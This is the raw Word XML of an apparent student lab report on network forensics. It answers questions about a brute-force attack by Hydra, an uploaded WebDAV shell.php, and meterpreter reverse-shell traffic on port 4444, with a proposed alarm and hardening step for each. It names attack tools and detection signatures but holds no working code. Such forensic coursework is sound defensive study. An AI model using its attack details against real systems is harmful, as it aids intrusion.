        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB44CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB44CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>connect_to_corp_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77A0D43B" w14:textId="6ED60917" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What kind of alarm would you set to detect this behavior in the future?</w:t>
      </w:r>
      <w:r w:rsidR="005B4D64">
        <w:t xml:space="preserve"> An alarm to monitor any logins to that ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B4D64">
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B4D64">
        <w:t>’ page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6E693" w14:textId="27E39F02" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="00F10FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack.</w:t>
      </w:r>
      <w:r w:rsidR="005B4D64">
        <w:t xml:space="preserve"> Enforce a much stronger password policy and training for Ashton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B209D9A" w14:textId="62203DE7" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify the brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD01E8" w14:textId="774C257B" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="00EB04C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Can you identify the packets specifically from Hydra?</w:t>
      </w:r>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B611A">
        <w:t>User_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008B611A">
        <w:t>agent.original</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B611A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B611A">
        <w:t>mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B611A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C9FD43" wp14:editId="432327BD">
            <wp:extent cx="5943600" cy="2020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How many requests were made in the brute-force attack?</w:t>
      </w:r>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B611A">
        <w:t>62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0017CFB7" w14:textId="30E2FEF8" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How many requests had the attacker made before discovering the correct password in this one?</w:t>
      </w:r>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B611A">
        <w:t>62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744912E2" w14:textId="79F4CBB6" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>What kind of alarm would you set to detect this behavior in the future and at what threshold?</w:t>
      </w:r>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> Set a low </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB44CF">
        <w:t>threshhold</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> that would lock out and send </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FB44CF">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB44CF">
        <w:t>laert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB44CF">
        <w:t xml:space="preserve"> for x # of page requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21892E" w14:textId="0462C58E" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C418C96" w14:textId="54552621" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stronger password policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250613D" w14:textId="07062F07" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38572AE9" w14:textId="77777777" w:rsidR="00C26E25" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How many requests were made to this directory? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA4749" w14:textId="0B7539D9" w:rsidR="00C26E25" w:rsidRDefault="00CD2D63" w:rsidP="001E1FD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B38E48B" wp14:editId="0326671A">
            <wp:extent cx="5943600" cy="2576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FDD">
        <w:t xml:space="preserve">Which files were requested? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B732FF" w14:textId="0860F0CD" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD2D63">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2D63">
        <w:t>passwd.dav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1058E98E" w14:textId="5594B353" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What kind of alarm would you set to detect such access in the future?</w:t>
      </w:r>
      <w:r w:rsidR="00C26E25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD2D63">
        <w:t>Alert to access by any machine other than specific IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B10BE" w14:textId="2C628151" w:rsidR="001E1FDD" w:rsidRDefault="001E1FDD" w:rsidP="001E1FDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack.</w:t>
      </w:r>
      <w:r w:rsidR="00C26E25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07C9B4" w14:textId="44B05D48" w:rsidR="00C26E25" w:rsidRDefault="00C26E25" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not allow upload of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF75CBD" w14:textId="5EC71F12" w:rsidR="00CD2D63" w:rsidRDefault="00CD2D63" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict connectivity/access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B9CFE" w14:textId="600AD407" w:rsidR="00C26E25" w:rsidRDefault="00C26E25" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify the reverse shell and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75018A" w14:textId="17FFDBAB" w:rsidR="00C26E25" w:rsidRDefault="00C26E25" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can you identify traffic from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AF8B3" w14:textId="292C5038" w:rsidR="00CD2D63" w:rsidRDefault="00CD2D63" w:rsidP="00CD2D63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yes, I can see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file that was uploaded and activity thru the port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E2C51" w14:textId="4EC6ED33" w:rsidR="00CD2D63" w:rsidRDefault="00CD2D63" w:rsidP="00CD2D63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1634E17B" w14:textId="412CE4A5" w:rsidR="00CD2D63" w:rsidRDefault="00CD2D63" w:rsidP="00CD2D63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Filter by 192.168.1.105 and port 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF5F23F" wp14:editId="0E5D37A4">
            <wp:extent cx="5943600" cy="30238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83AB1" wp14:editId="19FB98A5">
            <wp:extent cx="5943600" cy="2576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577B" w14:textId="18F54D83" w:rsidR="00C26E25" w:rsidRDefault="00C26E25" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What kinds of alarms would set to detect this behavior in the future?</w:t>
      </w:r>
      <w:r w:rsidR="00CD2D63">
        <w:t xml:space="preserve"> Alert by traffic over port 4444 or by upload of ANY php file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FBAE1" w14:textId="15AB5DCE" w:rsidR="00C26E25" w:rsidRDefault="00C26E25" w:rsidP="00C26E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify at least one way to harden the vulnerable machine that would mitigate this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A58B0" w14:textId="0F8E7FCF" w:rsidR="00CD2D63" w:rsidRDefault="00CD2D63" w:rsidP="00CD2D63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Remove ability to upload files.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CD2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7546D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="990E1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E40"/>
    <w:rsid w:val="00057675"/>
    <w:rsid w:val="00136B3E"/>
    <w:rsid w:val="001E1FDD"/>
    <w:rsid w:val="00344182"/>
    <w:rsid w:val="003B6143"/>
    <w:rsid w:val="00464DEB"/>
    <w:rsid w:val="00524438"/>
    <w:rsid w:val="00526E40"/>
    <w:rsid w:val="00571195"/>
    <w:rsid w:val="005B4D64"/>
    <w:rsid w:val="00604228"/>
    <w:rsid w:val="00651672"/>
    <w:rsid w:val="006C0509"/>
    <w:rsid w:val="006E77F4"/>
    <w:rsid w:val="00792490"/>
    <w:rsid w:val="00793C59"/>
    <w:rsid w:val="0085386E"/>
    <w:rsid w:val="008574D8"/>
    <w:rsid w:val="008A04ED"/>
    <w:rsid w:val="008B611A"/>
    <w:rsid w:val="00963FF9"/>
    <w:rsid w:val="00A71ADB"/>
    <w:rsid w:val="00B60E57"/>
    <w:rsid w:val="00C26E25"/>
    <w:rsid w:val="00CD2D63"/>
    <w:rsid w:val="00CF1719"/>
    <w:rsid w:val="00D32158"/>
    <w:rsid w:val="00D832F4"/>
    <w:rsid w:val="00E70009"/>
    <w:rsid w:val="00EE343D"/>
    <w:rsid w:val="00F10FBD"/>
    <w:rsid w:val="00F82560"/>
    <w:rsid w:val="00FB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46617"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3287AB91-2698-4DD6-BFB3-E038563D4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5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5812</TotalTime>
  <Pages>9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Gould</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Gould</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-12T00:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-17T02:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>